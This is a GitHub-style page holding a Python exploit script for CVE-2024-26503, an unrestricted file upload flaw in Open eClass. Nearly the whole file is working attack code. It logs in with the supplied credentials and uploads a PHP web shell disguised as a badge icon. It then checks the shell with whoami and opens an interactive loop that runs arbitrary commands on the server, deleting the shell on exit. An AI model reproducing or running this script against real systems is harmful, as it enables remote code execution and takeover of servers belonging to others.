-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit-cve-2024-26503.py
122 lines (92 loc) · 4.16 KB
/
exploit-cve-2024-26503.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
import requests
import argparse
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'
def banner():
print(f'''{RED}
___ _ _ ____ ____ __ ____ ___ ____ ___ ___ __ ____
/ __)/ )( \\( __)___(___ \\ / \\(___ \\ / _ \\ ___(___ \\ / __) / __) / \\( __ \\
( (__ \\ \\/ / ) _)(___)/ __/( 0 )/ __/(__ ((___)/ __/( _ \\(___ \\( 0 )(__ (
\\___) \\__/ (____) (____) \\__/(____) (__/ (____) \\___/(____/ \\__/(____/
{YELLOW}
============================ Author: RoboGR00t ============================
{RESET} ''')
def execute_command(openeclass):
while True:
# Prompt for user input with "eclass"
cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")
# Check if the command is 'quit', then break the loop
if cmd.lower() == "quit":
print(f"{ORANGE}\nExiting... removing '{RED}execute.php{ORANGE}'{RESET}")
requests.get(f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd=rm execute.php")
break
# Construct the URL with the user-provided command
url = f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd={cmd}"
# Execute the GET request
try:
response = requests.get(url)
# Check if the request was successful
if response.status_code == 200:
# Print the response text
print(f"{GREEN}{response.text}{RESET}")
except requests.exceptions.RequestException as e:
# Print any error that occurs during the request
print(f"{RED}An error occurred: {e}{RESET}")
def upload_web_shell(openeclass, username, password):
login_url = f'{openeclass}/?login_page=1'
login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'
# Login credentials
payload = {
'next': '/main/portfolio.php',
'uname': f'{username}',
'pass': f'{password}',
'submit': 'Enter'
}
headers = {
'Referer': login_page_url,
}
# Use a session to ensure cookies are handled correctly
with requests.Session() as session:
# (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens
session.get(login_page_url)
# Post the login credentials
response = session.post(login_url, headers=headers, data=payload)
url = f'{openeclass}/modules/admin/certbadge.php'
files = {
'icon': ('execute.php', '<?php echo shell_exec($_GET[\'cmd\']) ;?>', 'text/plain'),
'name': (None, ''),
'description': (None, ''),
'submit_badge_icon': (None, '')
}
response = session.post(url, files=files)
def is_successfull(openeclass):
url = f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd=whoami"
# Execute the GET request
try:
response = requests.get(url)
# Check if the request was successful
if response.status_code == 200:
# Print the response text
return True
else:
print("EXPLOITATION FAILED")
return False
except requests.exceptions.RequestException as e:
# Print any error that occurs during the request
print(f"An error occurred: {e}")
def main():
parser = argparse.ArgumentParser(description="Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution")
parser.add_argument('-u', '--username', required=True, help="Username for login")
parser.add_argument('-p', '--password', required=True, help="Password for login")
parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
args = parser.parse_args()
banner()
# Running the main login and execute command function
upload_web_shell(args.eclass, args.username, args.password)
if is_successfull(args.eclass) == True :
execute_command(args.eclass)
if __name__ == "__main__":
main()